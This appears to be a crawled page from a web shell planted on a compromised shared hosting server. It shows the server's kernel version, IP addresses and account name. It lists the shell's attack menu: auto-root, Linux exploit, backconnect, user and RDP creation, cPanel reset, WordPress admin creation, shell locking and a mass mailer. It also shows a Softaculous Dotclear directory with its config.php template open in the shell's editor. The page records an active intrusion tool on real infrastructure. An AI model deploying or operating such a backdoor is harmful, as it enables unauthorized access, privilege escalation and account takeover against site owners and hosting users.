Linux premium155.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
LiteSpeed
: 162.0.235.200 | : 3.138.135.201
Cant Read [ /etc/named.conf ]
7.4.33
varifktc
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
dotcl /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
changelog.txt
9.19
KB
-rw-r--r--
clone.php
7.3
KB
-rw-r--r--
config.php
2.65
KB
-rw-r--r--
dotcl.sql
33.43
KB
-rw-r--r--
dotcl.zip
5.55
MB
-rw-r--r--
edit.php
5.77
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
extend.php
11.55
KB
-rw-r--r--
fileindex.php
131
B
-rw-r--r--
import.php
3.34
KB
-rw-r--r--
info.xml
3.31
KB
-rw-r--r--
install.js
921
B
-rw-r--r--
install.php
4.54
KB
-rw-r--r--
install.xml
1.35
KB
-rw-r--r--
md5
1.16
KB
-rw-r--r--
notes.txt
617
B
-rw-r--r--
update_pass.php
498
B
-rw-r--r--
upgrade.php
3.77
KB
-rw-r--r--
upgrade.xml
325
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : config.php
<?php /** * @package Dotclear * * @copyright Olivier Meunier & Association Dotclear * @copyright AGPL-3.0 */ use Dotclear\Helper\File\Path; if (!defined('DC_RC_PATH')) { return; } // Database driver (mysql (deprecated, disabled in PHP7), mysqli, mysqlimb4 (full UTF-8), pgsql, sqlite) define('DC_DBDRIVER','mysqli'); // Database hostname (usually "localhost") define('DC_DBHOST','[[softdbhost]]'); // Database user define('DC_DBUSER','[[softdbuser]]'); // Database password define('DC_DBPASSWORD','[[softdbpass]]'); // Database name define('DC_DBNAME','[[softdb]]'); // Tables' prefix define('DC_DBPREFIX','[[dbprefix]]'); // Persistent database connection define('DC_DBPERSIST', false); // Crypt key (password storage) define('DC_MASTER_KEY','[[secret]]'); // Admin URL. You need to set it for some features. define('DC_ADMIN_URL','[[softurl]]/admin/'); // Admin mail from address. For password recovery and such. define('DC_ADMIN_MAILFROM','[[admin_email]]'); // Cookie's name define('DC_SESSION_NAME', 'dcxd'); // Session TTL //define('DC_SESSION_TTL','120 seconds'); // Plugins root define('DC_PLUGINS_ROOT', __DIR__ . '/../plugins'); // Template cache directory define('DC_TPL_CACHE', Path::real(__DIR__ . '/..') . '/cache'); // Var directory define('DC_VAR', Path::real(__DIR__ . '/..') . '/var'); // Cryptographic algorithm define('DC_CRYPT_ALGO', 'sha512'); // Vendor name //define('DC_VENDOR_NAME', 'Dotclear'); // Do not check for update //define('DC_NOT_UPDATE', false); // Update URL //define('DC_UPDATE_URL','https://download.dotclear.org/versions.xml'); // Update channel (stable, unstable, testing) //define('DC_UPDATE_VERSION', 'stable'); // Proxy config //define('HTTP_PROXY_HOST','127.0.0.1'); //define('HTTP_PROXY_PORT','8080'); //define('DC_REVERSE_PROXY',true); // Show hidden media dirs //define('DC_SHOW_HIDDEN_DIRS', false); // Store update checking //define('DC_STORE_NOT_UPDATE', false); // Disable REST services (may be useful during debugging session) //define('DC_REST_SERVICES', false); // Load Legacy JS library //define('DC_MIGRATE', false); // If you have PATH_INFO issue, uncomment following lines //if (!isset($_SERVER['ORIG_PATH_INFO'])) { // $_SERVER['ORIG_PATH_INFO'] = ''; //} //$_SERVER['PATH_INFO'] = $_SERVER['ORIG_PATH_INFO']; // If you have mail problems, uncomment following lines and adapt it to your hosting configuration // For more information about this setting, please refer to https://dotclear.org/documentation/2.0/admin/install/custom-sendmail //function _mail($to, $subject, $message, $headers) //{ // MailSocket::$smtp_relay = 'my.smtp.relay.org'; // MailSocket::mail($to, $subject, $message, $headers); //}
Close